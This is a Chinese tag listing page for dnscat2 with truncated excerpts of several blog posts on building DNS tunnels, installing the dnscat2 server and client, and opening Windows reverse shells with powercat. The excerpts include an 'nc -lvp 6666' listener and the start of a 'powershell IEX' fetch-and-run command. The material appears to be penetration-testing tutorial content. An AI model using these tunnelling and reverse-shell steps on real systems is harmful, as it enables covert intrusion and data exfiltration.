首页 > TAG信息列表 > dnscat2

Dnscat2隧道

0x01 前言   DNS是用来做域名解析的,是连接互联网的关键,故即使是企业内网,在防火墙高度关闭下,也有着很好的连通性,但是黑客却可以通过将其他协议的内容封装再DNS协议中,然后通过DNS请求和响应来传输数据和完成控制。 0x02 DNS隧道的方式 目前DNS隧道目前按照连接方式来分:直连隧道和

DNS Tunnel dnscat2复现

https://github.com/iagox86/dnscat2 配置环境 Kali Server端 $ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/server/ $ gem install bundler $ apt-get install ruby-dev $ bundle install Client端 $ git clone https://github.com/iagox86/dnscat2 $ cd d

dnscat2搭建dns隧道

域名购买网站:https://dcc.godaddy.com/ 购买域名,并且注册网站,应用该模块 安装服务端: apt-get install gem apt-get install ruby-dev apt-get install libpq-dev cd dnscat2/server git clone https://github.com/iagox86/dnscat2.git 编译 bundle install 中继模式启动服务

widnows下反弹shell的几种方法---持续跟新

1.powercat反弹shell powercat(https://github.com/besimorhino/powercat )为Powershell版的Netcat,实际上是一个powershell的函数,使用方法类似Netcat 首先攻击者开启监听 nc -lvp 6666 或者使用powercat监听 powercat -l -p 6666 接着在目标机上反弹cmd shell: powershell IEX (